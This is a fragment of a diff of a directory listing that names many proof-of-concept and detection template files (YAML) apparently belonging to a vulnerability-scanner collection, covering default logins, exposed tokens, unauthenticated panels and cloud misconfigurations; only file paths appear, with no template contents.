./poc/auth/sequoiadb-default-login-10150.yaml ./poc/auth/sequoiadb-default-login-10152.yaml ./poc/auth/sequoiadb-login.yaml +./poc/auth/server-backup-login-10153.yaml ./poc/auth/server-backup-login-10154.yaml ./poc/auth/server-backup-login-10155.yaml -./poc/auth/server-backup-login-10156.yaml ./poc/auth/server-backup-login.yaml ./poc/auth/server-backup-manager-se-login-detect.yaml ./poc/auth/server-private-keys-1.yaml @@ -3776,13 +3745,12 @@ ./poc/auth/server-private-keys-9.yaml ./poc/auth/server-private-keys.yaml ./poc/auth/service-account-credentials.yaml +./poc/auth/service-pwd-10176.yaml ./poc/auth/service-pwd-10177.yaml ./poc/auth/service-pwd-10178.yaml ./poc/auth/service-pwd-10179.yaml -./poc/auth/service-pwd.yaml ./poc/auth/servicedesk-login-panel-1.yaml ./poc/auth/servicedesk-login-panel-10171.yaml -./poc/auth/servicedesk-login-panel-10172.yaml ./poc/auth/servicedesk-login-panel-10173.yaml ./poc/auth/servicedesk-login-panel-2.yaml ./poc/auth/servicedesk-login-panel.yaml @@ -3810,12 +3778,11 @@ ./poc/auth/shikongzhiyou-erp-login-fileread.yaml ./poc/auth/shikongzhiyou-login_fileread.yaml ./poc/auth/shiro-124-rememberme.yaml -./poc/auth/shopify-custom-token-10198.yaml +./poc/auth/shopify-custom-token(1).yaml ./poc/auth/shopify-custom-token-11860.yaml ./poc/auth/shopify-custom-token.yaml ./poc/auth/shopify-legacy-private-app-token.yaml ./poc/auth/shopify-private-token-10199.yaml -./poc/auth/shopify-private-token-11861.yaml ./poc/auth/shopify-private-token.yaml ./poc/auth/shopify-shared-secret-11862.yaml ./poc/auth/shopify-shared-secret.yaml @@ -3824,6 +3791,8 @@ ./poc/auth/shoppable-token-10206.yaml ./poc/auth/shoppable-token-10207.yaml ./poc/auth/shoppable-token-10208.yaml +./poc/auth/shoppable-token-10209.yaml +./poc/auth/shoppable-token.yaml ./poc/auth/showdoc-default-login-10219.yaml ./poc/auth/showdoc-default-login-10220.yaml ./poc/auth/showdoc-default-login-10221.yaml @@ -3863,10 +3832,10 @@ ./poc/auth/sitecore-login.yaml ./poc/auth/sitefinity-login-10295.yaml ./poc/auth/sitefinity-login-10296.yaml -./poc/auth/sitefinity-login-10298.yaml +./poc/auth/sitefinity-login-10297.yaml ./poc/auth/sitefinity-login-10299.yaml ./poc/auth/sitefinity-login.yaml -./poc/auth/siteomat-login-10300.yaml +./poc/auth/siteomat-login-10301.yaml ./poc/auth/siteomat-login-10302.yaml ./poc/auth/siteomat-login-10303.yaml ./poc/auth/siteomat-login.yaml @@ -3877,6 +3846,7 @@ ./poc/auth/slack-api-token.yaml ./poc/auth/slack-bot-token-10310.yaml ./poc/auth/slack-bot-token-10311.yaml +./poc/auth/slack-bot-token-10312.yaml ./poc/auth/slack-user-token-10314.yaml ./poc/auth/slack-webhook-token-10315.yaml ./poc/auth/slocum-login-10317.yaml @@ -3903,22 +3873,20 @@ ./poc/auth/social-login-lite-for-woocommerce.yaml ./poc/auth/social-login-wp-e99eebfad9065c45993831ff9d87e487.yaml ./poc/auth/social-login-wp.yaml -./poc/auth/solar-log-authbypass-10352.yaml ./poc/auth/solar-log-authbypass-10353.yaml +./poc/auth/solar-log-authbypass.yaml ./poc/auth/solarwinds-default-login-1.yaml ./poc/auth/solarwinds-default-login-10354.yaml -./poc/auth/solarwinds-default-login-10355.yaml ./poc/auth/solarwinds-default-login-10356.yaml ./poc/auth/solarwinds-default-login-2.yaml +./poc/auth/somfy-login-10371.yaml ./poc/auth/somfy-login-10372.yaml -./poc/auth/somfy-login-10373.yaml ./poc/auth/somfy-login.yaml ./poc/auth/sonarqube-cred.yaml ./poc/auth/sonarqube-cve-2020-27986-unauth.yml ./poc/auth/sonarqube-login-10374.yaml ./poc/auth/sonarqube-login-10375.yaml ./poc/auth/sonarqube-login.yaml -./poc/auth/sonarqube-token-10380.yaml ./poc/auth/sonarqube-token-10381.yaml ./poc/auth/sonarqube-token-10382.yaml ./poc/auth/sonic-wall-login.yaml @@ -3930,6 +3898,7 @@ ./poc/auth/spark-api-unauth.yml ./poc/auth/spark-unauth.yaml ./poc/auth/spark-webui-unauth-10400.yaml +./poc/auth/spark-webui-unauth-10401.yaml ./poc/auth/spark-webui-unauth-10402.yaml ./poc/auth/spark-webui-unauth.yaml ./poc/auth/spark-webui-unauth.yml @@ -3939,14 +3908,14 @@ ./poc/auth/spectracom-default-login-10406.yaml ./poc/auth/spectracom-default-password.yaml ./poc/auth/sphider-login-1.yaml -./poc/auth/sphider-login-10407.yaml ./poc/auth/sphider-login-10408.yaml +./poc/auth/sphider-login-10409.yaml ./poc/auth/sphider-login-10410.yaml ./poc/auth/sphider-login-2.yaml ./poc/auth/sphider-login-3.yaml ./poc/auth/sphider-login.yaml ./poc/auth/splunk-enterprise-login-panel.yaml -./poc/auth/splunk-enterprise-login-panel.yml +./poc/auth/splunk-login-10416.yaml ./poc/auth/splunk-login-10417.yaml ./poc/auth/splunk-login-10418.yaml ./poc/auth/splunk-login-10419.yaml @@ -3956,7 +3925,7 @@ ./poc/auth/springboot-actuator-unauth.yaml ./poc/auth/springboot-env-unauth.yaml ./poc/auth/springboot-env-unauth.yml -./poc/auth/square-access-token(1).yaml +./poc/auth/square-access-token-11867.yaml ./poc/auth/square-access-token.yaml ./poc/auth/square-oauth-secret-11868.yaml ./poc/auth/square-oauth-secret.yaml @@ -3984,35 +3953,35 @@ ./poc/auth/stackstorm-default-login.yaml ./poc/auth/stem-audio-table-private-keys-10533.yaml ./poc/auth/stem-audio-table-private-keys-10534.yaml -./poc/auth/stem-audio-table-private-keys-10536.yaml +./poc/auth/stem-audio-table-private-keys-10535.yaml ./poc/auth/stem-audio-table-private-keys.yaml ./poc/auth/steve-login-panel.yaml ./poc/auth/storm-unauthorized-access.yaml -./poc/auth/stripe-api-key-11869.yaml +./poc/auth/stripe-api-key(1).yaml ./poc/auth/stripe-api-key.yaml ./poc/auth/stripe-restricted-key-10553.yaml ./poc/auth/stripe-restricted-key-10554.yaml +./poc/auth/stripe-restricted-key.yaml ./poc/auth/stripe-secret-key-10556.yaml ./poc/auth/stripe-secret-key-10557.yaml ./poc/auth/stripe-secret-key-10558.yaml ./poc/auth/structurizr-default-login.yaml ./poc/auth/submitty-login-10567.yaml -./poc/auth/submitty-login-10568.yaml ./poc/auth/submitty-login.yaml ./poc/auth/subrion-login.yaml ./poc/auth/sunlogin.yaml ./poc/auth/sunlogin_RCE_CNVD-2022-10270.yaml ./poc/auth/supermicro-default-login-10572.yaml +./poc/auth/supermicro-default-login.yaml ./poc/auth/superset-default-login-10573.yaml ./poc/auth/superset-default-login-10574.yaml ./poc/auth/superset-default-login.yaml ./poc/auth/superset-login.yaml -./poc/auth/symantec-dlp-login-10596.yaml ./poc/auth/symantec-dlp-login-10597.yaml ./poc/auth/symantec-dlp-login-10598.yaml ./poc/auth/symantec-dlp-login.yaml +./poc/auth/symantec-epm-login-10599.yaml ./poc/auth/symantec-epm-login-10600.yaml -./poc/auth/symantec-epm-login-10601.yaml ./poc/auth/symantec-epm-login-10602.yaml ./poc/auth/symantec-epm-login.yaml ./poc/auth/symantec-ewep-login-10604.yaml @@ -4022,7 +3991,7 @@ ./poc/auth/szhe-default-login-10635.yaml ./poc/auth/szhe-default-login-10636.yaml ./poc/auth/szhe-default-login-10637.yaml -./poc/auth/szhe-default-login.yaml +./poc/auth/szhe-default-login-10638.yaml ./poc/auth/szhe-default-password-10639.yaml ./poc/auth/szhe-default-password-10640.yaml ./poc/auth/szhe-default-password.yaml @@ -4030,6 +3999,7 @@ ./poc/auth/teamcity-login-panel.yaml ./poc/auth/teamtalk-login.yaml ./poc/auth/telecom-gateway-default-login-10686.yaml +./poc/auth/telecom-gateway-default-login.yaml ./poc/auth/telecom-gateway-default-password.yaml ./poc/auth/telecom-gateway-default-password.yml ./poc/auth/telegram-token.yaml @@ -4053,8 +4023,8 @@ ./poc/auth/threatq-login.yaml ./poc/auth/thruk-login.yaml ./poc/auth/tidb-native-password.yaml +./poc/auth/tidb-unauth-10770.yaml ./poc/auth/tidb-unauth-10771.yaml -./poc/auth/tidb-unauth-10772.yaml ./poc/auth/tidb-unauth.yaml ./poc/auth/timekeeper-default-login.yaml ./poc/auth/tingsboard-default-login.yaml @@ -4066,6 +4036,7 @@ ./poc/auth/tomcat-default-login-10789.yaml ./poc/auth/tomcat-default-login-10790.yaml ./poc/auth/tomcat-default-login-10791.yaml +./poc/auth/tomcat-default-login.yaml ./poc/auth/tomcat-examples-login.yaml ./poc/auth/tomcat-manager-default-creds.yaml ./poc/auth/tongda-meeting-unauthorized-access.yml @@ -4113,8 +4084,9 @@ ./poc/auth/tyan-rmm-bmc-default-login.yaml ./poc/auth/typo3-login.yaml ./poc/auth/ucmdb-default-login-10868.yaml -./poc/auth/ucmdb-default-login-10869.yaml ./poc/auth/ucmdb-default-login-10870.yaml +./poc/auth/ucmdb-default-login-10871.yaml +./poc/auth/ucmdb-default-login.yaml ./poc/auth/uk-cookie-consent-0bbba77520762097a09ab36a8d9ac90f.yaml ./poc/auth/uk-cookie-consent.yaml ./poc/auth/uk-cookie-d24507ac932285b70361a7e9dd308165.yaml @@ -4125,11 +4097,10 @@ ./poc/auth/unauth-ftp-10939.yaml ./poc/auth/unauth-ftp-10940.yaml ./poc/auth/unauth-ftp-10941.yaml -./poc/auth/unauth-ftp-10942.yaml ./poc/auth/unauth-ftp.yaml ./poc/auth/unauth-hoteldruid-panel-1.yaml -./poc/auth/unauth-hoteldruid-panel-10943.yaml ./poc/auth/unauth-hoteldruid-panel-2.yaml +./poc/auth/unauth-hoteldruid-panel.yaml ./poc/auth/unauth-kubecost.yaml ./poc/auth/unauth-ldap-account-manager.yaml ./poc/auth/unauth-mautic-upgrade.yaml @@ -4149,33 +4120,33 @@ ./poc/auth/unauth-spark-api-10963.yaml ./poc/auth/unauth-spark-api-10964.yaml ./poc/auth/unauth-spark-api-10965.yaml -./poc/auth/unauth-spark-api.yaml ./poc/auth/unauth-temporal-web-ui.yaml ./poc/auth/unauth-wavink-panel-10966.yaml -./poc/auth/unauth-xproxy-dashboard-10968.yaml +./poc/auth/unauth-wavink-panel-10967.yaml +./poc/auth/unauth-xproxy-dashboard-10969.yaml ./poc/auth/unauth-xproxy-dashboard.yaml ./poc/auth/unauth-zwave-mqtt.yaml ./poc/auth/unauthen-elastic.yaml ./poc/auth/unauthen-kibana.yaml +./poc/auth/unauthenticated-airflow-10884.yaml ./poc/auth/unauthenticated-airflow-10885.yaml -./poc/auth/unauthenticated-airflow-10886.yaml ./poc/auth/unauthenticated-airflow-10887.yaml ./poc/auth/unauthenticated-airflow.yaml ./poc/auth/unauthenticated-alert-manager-10888.yaml ./poc/auth/unauthenticated-alert-manager-10889.yaml ./poc/auth/unauthenticated-alert-manager-10890.yaml ./poc/auth/unauthenticated-alert-manager-10891.yaml -./poc/auth/unauthenticated-alert-manager-10892.yaml ./poc/auth/unauthenticated-frp-10893.yaml ./poc/auth/unauthenticated-frp-10894.yaml +./poc/auth/unauthenticated-frp-10895.yaml ./poc/auth/unauthenticated-frp-10896.yaml -./poc/auth/unauthenticated-frp-10897.yaml ./poc/auth/unauthenticated-frp.yaml ./poc/auth/unauthenticated-glances-10898.yaml ./poc/auth/unauthenticated-glances-10899.yaml ./poc/auth/unauthenticated-glowroot-10900.yaml ./poc/auth/unauthenticated-glowroot-10901.yaml ./poc/auth/unauthenticated-glowroot-10902.yaml +./poc/auth/unauthenticated-influxdb-10903.yaml ./poc/auth/unauthenticated-influxdb.yaml ./poc/auth/unauthenticated-jenkin-dashboard.yaml ./poc/auth/unauthenticated-jenkins.yaml @@ -4188,10 +4159,11 @@ ./poc/auth/unauthenticated-mongo-express-10910.yaml ./poc/auth/unauthenticated-mongo-express-10911.yaml ./poc/auth/unauthenticated-mongo-express-2.yaml +./poc/auth/unauthenticated-mongo-express.yaml ./poc/auth/unauthenticated-nacos-access-1.yaml +./poc/auth/unauthenticated-nacos-access-10912.yaml ./poc/auth/unauthenticated-nacos-access-10913.yaml ./poc/auth/unauthenticated-nacos-access-10914.yaml -./poc/auth/unauthenticated-nacos-access-10915.yaml ./poc/auth/unauthenticated-nacos-access-2.yaml ./poc/auth/unauthenticated-nacos-access.yaml ./poc/auth/unauthenticated-netdata-10916.yaml @@ -4200,11 +4172,12 @@ ./poc/auth/unauthenticated-nginx-dashboard.yaml ./poc/auth/unauthenticated-popup-upload-10919.yaml ./poc/auth/unauthenticated-popup-upload-10920.yaml -./poc/auth/unauthenticated-popup-upload-10922.yaml +./poc/auth/unauthenticated-popup-upload-10921.yaml ./poc/auth/unauthenticated-popup-upload-10923.yaml -./poc/auth/unauthenticated-prtg-10924.yaml +./poc/auth/unauthenticated-popup-upload.yaml ./poc/auth/unauthenticated-prtg-10925.yaml ./poc/auth/unauthenticated-prtg-10926.yaml +./poc/auth/unauthenticated-prtg-10927.yaml ./poc/auth/unauthenticated-prtg-10928.yaml ./poc/auth/unauthenticated-qax-vpn-access.yaml ./poc/auth/unauthenticated-tensorboard-10929.yaml @@ -4214,24 +4187,23 @@ ./poc/auth/unauthenticated-varnish-cache-purge-10934.yaml ./poc/auth/unauthenticated-varnish-cache-purge.yaml ./poc/auth/unauthenticated-zipkin-10936.yaml -./poc/auth/unauthenticated-zipkin.yaml ./poc/auth/unauthenticated-zippkin-10938.yaml ./poc/auth/unauthenticated-zippkin.yaml ./poc/auth/unauthorized-access-to-secret.yaml ./poc/auth/unauthorized-access.yaml ./poc/auth/unauthorized-brother-access-detect.yaml -./poc/auth/unauthorized-h3csecparh-login-10948.yaml ./poc/auth/unauthorized-h3csecparh-login-10949.yaml +./poc/auth/unauthorized-h3csecparh-login.yaml ./poc/auth/unauthorized-hp-officepro-printer-10950.yaml ./poc/auth/unauthorized-hp-officepro-printer.yaml +./poc/auth/unauthorized-hp-printer-10951.yaml ./poc/auth/unauthorized-hp-printer-10952.yaml ./poc/auth/unauthorized-hp-printer-10954.yaml ./poc/auth/unauthorized-hp-printer.yaml ./poc/auth/unauthorized-plastic-scm-10955.yaml ./poc/auth/unauthorized-plastic-scm-10956.yaml -./poc/auth/unauthorized-plastic-scm-10957.yaml ./poc/auth/unauthorized-printer-hp.yaml -./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/auth/unauthorized-puppet-node-manager-detect.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml @@ -4258,16 +4230,16 @@ ./poc/auth/versa-director-login.yaml ./poc/auth/versa-flexvnf-ui-default-login.yaml ./poc/auth/vidyo-default-login-11008.yaml -./poc/auth/vidyo-default-login-11009.yaml -./poc/auth/vidyo-default-login.yaml +./poc/auth/vidyo-default-login-11010.yaml ./poc/auth/vidyo-login.yaml +./poc/auth/vigor-login-11020.yaml ./poc/auth/vigor-login-11021.yaml ./poc/auth/vigor-login-11022.yaml -./poc/auth/vigor-login-11023.yaml ./poc/auth/vigor-login-page-2000-series.yaml ./poc/auth/vigor-login-page.yaml ./poc/auth/vigor-login.yaml ./poc/auth/visionhub-default-credentials.yaml +./poc/auth/visionhub-default-login-11026.yaml ./poc/auth/visionhub-default-login-11027.yaml ./poc/auth/visionhub-default-login-11028.yaml ./poc/auth/visionhub-default-login-11029.yaml @@ -4277,8 +4249,8 @@ ./poc/auth/vmware-hcx-login.yaml ./poc/auth/vmware-nsx-login.yaml ./poc/auth/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml +./poc/auth/vpms-auth-bypass-11066.yaml ./poc/auth/vpms-auth-bypass-11067.yaml -./poc/auth/vpms-auth-bypass-11068.yaml ./poc/auth/vpms-auth-bypass-11069.yaml ./poc/auth/vpms-auth-bypass.yaml ./poc/auth/vrealize-loginsight-panel.yaml @@ -4287,8 +4259,8 @@ ./poc/auth/wanhuOA-default-login.yaml ./poc/auth/wanhuOA-sqli-outMailLoginCheck.yaml ./poc/auth/watchguard-credentials-disclosure-11105.yaml -./poc/auth/watchguard-credentials-disclosure-11106.yaml ./poc/auth/watchguard-credentials-disclosure-11107.yaml +./poc/auth/watchguard-credentials-disclosure.yaml ./poc/auth/wayos-ac-centralized-management-system-default-weak-password.yaml ./poc/auth/wayos-default-password.yaml ./poc/auth/wazuh-default-login.yaml @@ -4304,7 +4276,6 @@ ./poc/auth/web3-authentication.yaml ./poc/auth/weblogic-login-11150.yaml ./poc/auth/weblogic-login.yaml -./poc/auth/weblogic-weak-login-11154.yaml ./poc/auth/weblogic-weak-login-11155.yaml ./poc/auth/weblogic-weak-login-11156.yaml ./poc/auth/webmethod-integration-default-login.yaml @@ -4322,7 +4293,6 @@ ./poc/auth/wifisky-default-login-11203.yaml ./poc/auth/wifisky-default-login-11204.yaml ./poc/auth/wifisky-default-login.yaml -./poc/auth/wifisky-default-password-11205.yaml ./poc/auth/wifisky-default-password-11206.yaml ./poc/auth/wifisky-default-password-cnvd-2021-39012.yml ./poc/auth/wifisky-default-password.yaml @@ -4339,7 +4309,6 @@ ./poc/auth/wordpress-infinitewp-auth-bypass-11285.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11286.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml -./poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml ./poc/auth/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/auth/wordpress-infinitewp-auth-bypass.yaml ./poc/auth/wordpress-login-11293.yaml @@ -4356,7 +4325,7 @@ ./poc/auth/wordpress-updraftplus-pem-key.yaml ./poc/auth/wordpress-weak-credentials-11334.yaml ./poc/auth/wordpress-weak-credentials-11335.yaml -./poc/auth/wordpress-weak-credentials-11337.yaml +./poc/auth/wordpress-weak-credentials-11336.yaml ./poc/auth/wordpress-weak-credentials.yaml ./poc/auth/wp-activate-register-redirect.yaml ./poc/auth/wp-cookie-user-info-d2666c85e1e86cfe042cf280f363f5ef.yaml @@ -4441,8 +4410,8 @@ ./poc/auth/wpconfig-aws-keys-1.yaml ./poc/auth/wpconfig-aws-keys-2.yaml ./poc/auth/wpconfig-aws-keys.yaml +./poc/auth/wpdm-cache-session-11436.yaml ./poc/auth/wpdm-cache-session-11437.yaml -./poc/auth/wpdm-cache-session-11438.yaml ./poc/auth/wpdm-cache-session-11439.yaml ./poc/auth/wpdm-cache-session.yaml ./poc/auth/wpmudev-pub-keys-11504.yaml @@ -4481,20 +4450,19 @@ ./poc/auth/wso2-default-login-11640.yaml ./poc/auth/wso2-default-login-11641.yaml ./poc/auth/wso2-default-login-11642.yaml -./poc/auth/wso2-default-login.yaml ./poc/auth/wso2-default-password.yaml ./poc/auth/xenforo-login-11670.yaml ./poc/auth/xenforo-login-11671.yaml ./poc/auth/xenforo-login-11672.yaml -./poc/auth/xenforo-login-11674.yaml ./poc/auth/xenforo-login.yaml +./poc/auth/xenmobile-login-11675.yaml ./poc/auth/xenmobile-login-11676.yaml -./poc/auth/xenmobile-login-11677.yaml ./poc/auth/xenmobile-login.yaml ./poc/auth/xerox-workcentre7-default-password.yaml ./poc/auth/xerox7-default-login-11678.yaml ./poc/auth/xerox7-default-login-11679.yaml ./poc/auth/xerox7-default-login-11680.yaml +./poc/auth/xerox7-default-login.yaml ./poc/auth/xerox7-default-password.yaml ./poc/auth/xiaomi-wireless-router-login.yaml ./poc/auth/xibocms-login.yaml @@ -4503,9 +4471,9 @@ ./poc/auth/xvr-login-11702.yaml ./poc/auth/xvr-login-11703.yaml ./poc/auth/xvr-login-11704.yaml +./poc/auth/xvr-login-11705.yaml ./poc/auth/xvr-login-11706.yaml ./poc/auth/xvr-login.yaml -./poc/auth/xxljob-default-login-11709.yaml ./poc/auth/xxljob-default-login-11710.yaml ./poc/auth/xxljob-default-login-11711.yaml ./poc/auth/xxljob-default-login-11712.yaml @@ -4552,25 +4520,28 @@ ./poc/auth/zabbix-default-password.yml ./poc/auth/zabbix-server-login-11767.yaml ./poc/auth/zabbix-server-login-11768.yaml +./poc/auth/zabbix-server-login-11769.yaml ./poc/auth/zabbix-server-login-11770.yaml ./poc/auth/zabbix-server-login.yaml ./poc/auth/zapier-webhook-token-11771.yaml ./poc/auth/zenario-login-panel-11776.yaml ./poc/auth/zenario-login-panel.yaml ./poc/auth/zentao-zentaosid-auth-bypass.yaml +./poc/auth/zeroshell-login-11788.yaml ./poc/auth/zeroshell-login-11789.yaml -./poc/auth/zeroshell-login-11790.yaml ./poc/auth/zeroshell-login.yaml -./poc/auth/zhiyuan-oa-session-leak-11801.yaml +./poc/auth/zhiyuan-oa-session-leak-11802.yaml ./poc/auth/zhiyuan-oa-session-leak-11803.yaml ./poc/auth/zhiyuan-oa-session-leak-11804.yaml ./poc/auth/zhiyuan-oa-session-leak-11805.yaml +./poc/auth/zhiyuan-oa-session-leak.yaml +./poc/auth/zhiyuan-oa-unauthorized-11806.yaml ./poc/auth/zhiyuan-oa-unauthorized-11807.yaml -./poc/auth/zhiyuan-oa-unauthorized-11808.yaml ./poc/auth/zhiyuan-oa-unauthorized.yaml ./poc/auth/zhiyuan-session-leakage.yaml ./poc/auth/zimbra-preauth-ssrf-11809.yaml ./poc/auth/zimbra-preauth-ssrf-11810.yaml +./poc/auth/zimbra-preauth-ssrf.yaml ./poc/auth/zimbra-web-login.yaml ./poc/auth/zipkin-unauth-11823.yaml ./poc/auth/zipkin-unauth.yaml @@ -4583,8 +4554,8 @@ ./poc/auth/zmanda-default-login-11827.yaml ./poc/auth/zmanda-default-login-11828.yaml ./poc/auth/zms-auth-bypass-11829.yaml +./poc/auth/zms-auth-bypass-11830.yaml ./poc/auth/zms-auth-bypass-11831.yaml -./poc/auth/zms-auth-bypass-11832.yaml ./poc/auth/zms-auth-bypass.yaml ./poc/auth/zoho-webhook-token-11835.yaml ./poc/auth/zoho-webhook-token-11836.yaml @@ -4748,9 +4719,8 @@ ./poc/aws/amazon-auto-links-plugin.yaml ./poc/aws/amazon-auto-links.yaml ./poc/aws/amazon-docker-config-279.yaml -./poc/aws/amazon-docker-config-280.yaml -./poc/aws/amazon-docker-config-disclosure-278.yaml ./poc/aws/amazon-docker-config-disclosure.yaml +./poc/aws/amazon-docker-config.yaml ./poc/aws/amazon-ec2-ssrf.yaml ./poc/aws/amazon-einzeltitellinks-6c575ce7bdb8499dce4ce35ed88e8474.yaml ./poc/aws/amazon-einzeltitellinks.yaml @@ -4788,20 +4758,19 @@ ./poc/aws/arconix-faq-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/arconix-shortcodes-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/armember-membership-76d089af6b78d98ec2c18a1732ae08c5.yaml -./poc/aws/aws-access-id-618.yaml ./poc/aws/aws-access-id-619.yaml -./poc/aws/aws-access-id-620.yaml ./poc/aws/aws-access-id.yaml ./poc/aws/aws-access-key-value-622.yaml ./poc/aws/aws-access-key-value-623.yaml +./poc/aws/aws-access-key-value-624.yaml ./poc/aws/aws-access-key-value-625.yaml ./poc/aws/aws-access-key-value.yaml ./poc/aws/aws-access-key.yaml ./poc/aws/aws-app-enum.yaml ./poc/aws/aws-bucket-service-626.yaml ./poc/aws/aws-bucket-service-627.yaml -./poc/aws/aws-bucket-service-628.yaml ./poc/aws/aws-bucket-service-629.yaml +./poc/aws/aws-bucket-service.yaml ./poc/aws/aws-bucket-takeover-630.yaml ./poc/aws/aws-bucket-takeover-631.yaml ./poc/aws/aws-bucket-takeover.yaml @@ -4809,11 +4778,9 @@ ./poc/aws/aws-cdn-by-wpadmin.yaml ./poc/aws/aws-cloudfront-service-633.yaml ./poc/aws/aws-cloudfront-service-634.yaml -./poc/aws/aws-cloudfront-service-635.yaml ./poc/aws/aws-code-env.yaml ./poc/aws/aws-cognito-636.yaml ./poc/aws/aws-cognito-637.yaml -./poc/aws/aws-cognito-638.yaml ./poc/aws/aws-cognito.yaml ./poc/aws/aws-config-not-enabled.yaml ./poc/aws/aws-ec2-autoscale.yaml @@ -4821,12 +4788,10 @@ ./poc/aws/aws-ec2.yaml ./poc/aws/aws-ecs-container-agent-tasks-639.yaml ./poc/aws/aws-ecs-container-agent-tasks-640.yaml -./poc/aws/aws-ecs-container-agent-tasks-641.yaml ./poc/aws/aws-ecs-container-agent-tasks.yaml ./poc/aws/aws-elastic-beanstalk-detect-642.yaml ./poc/aws/aws-elastic-beanstalk-detect-643.yaml ./poc/aws/aws-elastic-beanstalk-detect-644.yaml -./poc/aws/aws-elastic-beanstalk-detect.yaml ./poc/aws/aws-elastic-beanstalk.yaml ./poc/aws/aws-metadata.yaml ./poc/aws/aws-mfa-not-enabled.yaml @@ -4834,9 +4799,10 @@ ./poc/aws/aws-object-listing-646.yaml ./poc/aws/aws-object-listing-647.yaml ./poc/aws/aws-object-listing.yaml -./poc/aws/aws-opensearch-login-650.yaml +./poc/aws/aws-opensearch-login-649.yaml ./poc/aws/aws-opensearch-login.yaml ./poc/aws/aws-rds-cluster.yaml +./poc/aws/aws-redirect-651.yaml ./poc/aws/aws-redirect-652.yaml ./poc/aws/aws-redirect-653.yaml ./poc/aws/aws-redirect-654.yaml @@ -4852,11 +4818,11 @@ ./poc/aws/awstats-config-1.yaml ./poc/aws/awstats-config-2.yaml ./poc/aws/awstats-config-655.yaml -./poc/aws/awstats-config.yaml +./poc/aws/awstats-config-656.yaml ./poc/aws/awstats-script-1.yaml ./poc/aws/awstats-script-2.yaml ./poc/aws/awstats-script-3.yaml -./poc/aws/awstats-script-658.yaml +./poc/aws/awstats-script-657.yaml ./poc/aws/awstats-script.yaml ./poc/aws/ays-facebook-popup-likebox-4d80be371c08993d257d71a67ec23c4b.yaml ./poc/aws/best-woocommerce-feed-b97fc2565dd574eec2be30a866171222.yaml @@ -4909,7 +4875,7 @@ ./poc/aws/easy-social-share-buttons3.yaml ./poc/aws/easy-testimonials-63219e4a52f76a6b0555468e9ceec2c8.yaml ./poc/aws/ec2-detection-7161.yaml -./poc/aws/ec2-detection-7162.yaml +./poc/aws/ec2-detection-7163.yaml ./poc/aws/ec2-imdsv2.yaml ./poc/aws/ec2-instance-information.yaml ./poc/aws/ec2-public-ip.yaml @@ -4961,7 +4927,6 @@ ./poc/aws/metadata-aws-8810.yaml ./poc/aws/metadata-aws-8811.yaml ./poc/aws/metadata-aws-8812.yaml -./poc/aws/metadata-aws.yaml ./poc/aws/mime-types-extended-da21a491c0c1b70fec28427963a101bc.yaml ./poc/aws/miniorange-saml-20-single-sign-on-c1ec21b40a223f72a0391ca004186868.yaml ./poc/aws/nd-restaurant-reservations-61b4800084edec2087aa04c88795185e.yaml @@ -5018,7 +4983,7 @@ ./poc/aws/s3-sensitive-api.yaml ./poc/aws/s3-server-side-encryption.yaml ./poc/aws/s3-subtakeover-9967.yaml -./poc/aws/s3-subtakeover-9968.yaml +./poc/aws/s3-subtakeover-9969.yaml ./poc/aws/s3-subtakeover.yaml ./poc/aws/s3-versioning.yaml ./poc/aws/s3-video-1e3ee3e7b398636c16a13429ce61da87.yaml @@ -5252,7 +5217,7 @@ ./poc/backup/database-backups-2c3b52741f120d634a1b6cf5bf4454f6.yaml ./poc/backup/database-backups.yaml ./poc/backup/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml -./poc/backup/db-backup-lfi-6774.yaml +./poc/backup/db-backup-lfi-6775.yaml ./poc/backup/db-backup-lfi-6776.yaml ./poc/backup/db-backup-lfi.yaml ./poc/backup/db-backup.yaml @@ -5314,19 +5279,19 @@ ./poc/backup/php-backup-files-7.yaml ./poc/backup/php-backup-files-8.yaml ./poc/backup/php-backup-files-9.yaml -./poc/backup/php-backup-files-9497.yaml +./poc/backup/php-backup-files-9498.yaml ./poc/backup/php-backup-files.yaml ./poc/backup/phpmybackuppro.yaml ./poc/backup/rds-backup-enable.yaml ./poc/backup/recent-backups-aecbf28838f410f4e37aa987e88ec484.yaml ./poc/backup/recent-backups.yaml +./poc/backup/server-backup-login-10153.yaml ./poc/backup/server-backup-login-10154.yaml ./poc/backup/server-backup-login-10155.yaml -./poc/backup/server-backup-login-10156.yaml ./poc/backup/server-backup-login.yaml -./poc/backup/server-backup-manager-se-10157.yaml ./poc/backup/server-backup-manager-se-10158.yaml ./poc/backup/server-backup-manager-se-10159.yaml +./poc/backup/server-backup-manager-se-10160.yaml ./poc/backup/server-backup-manager-se-10161.yaml ./poc/backup/server-backup-manager-se-login-detect.yaml ./poc/backup/server-backup-manager-se.yaml @@ -5350,8 +5315,8 @@ ./poc/backup/wordpress-db-backup-listing-11250.yaml ./poc/backup/wordpress-db-backup-listing.yaml ./poc/backup/wordpress-db-backup.yaml -./poc/backup/wordpress-total-upkeep-backup-download-11322.yaml ./poc/backup/wordpress-total-upkeep-backup-download-11323.yaml +./poc/backup/wordpress-total-upkeep-backup-download-11324.yaml ./poc/backup/wordpress-total-upkeep-backup-download.yaml ./poc/backup/wp-all-backup-1de8fa81dd8966d653962310f7ca2926.yaml ./poc/backup/wp-all-backup.yaml @@ -5502,15 +5467,15 @@ ./poc/cisco/cisco-asa-panel.yaml ./poc/cisco/cisco-asa-version.yaml ./poc/cisco/cisco-asa-workflow.yaml -./poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml +./poc/cisco/cisco-cloudcenter-suite-rce.yaml ./poc/cisco/cisco-cve-2020-3452-readfile.yml ./poc/cisco/cisco-edge-340-937.yaml ./poc/cisco/cisco-edge-340.yaml ./poc/cisco/cisco-email-security-detect.yaml ./poc/cisco/cisco-expressway-panel.yaml ./poc/cisco/cisco-expressway.yaml -./poc/cisco/cisco-finesse-login-938.yaml ./poc/cisco/cisco-finesse-login-939.yaml 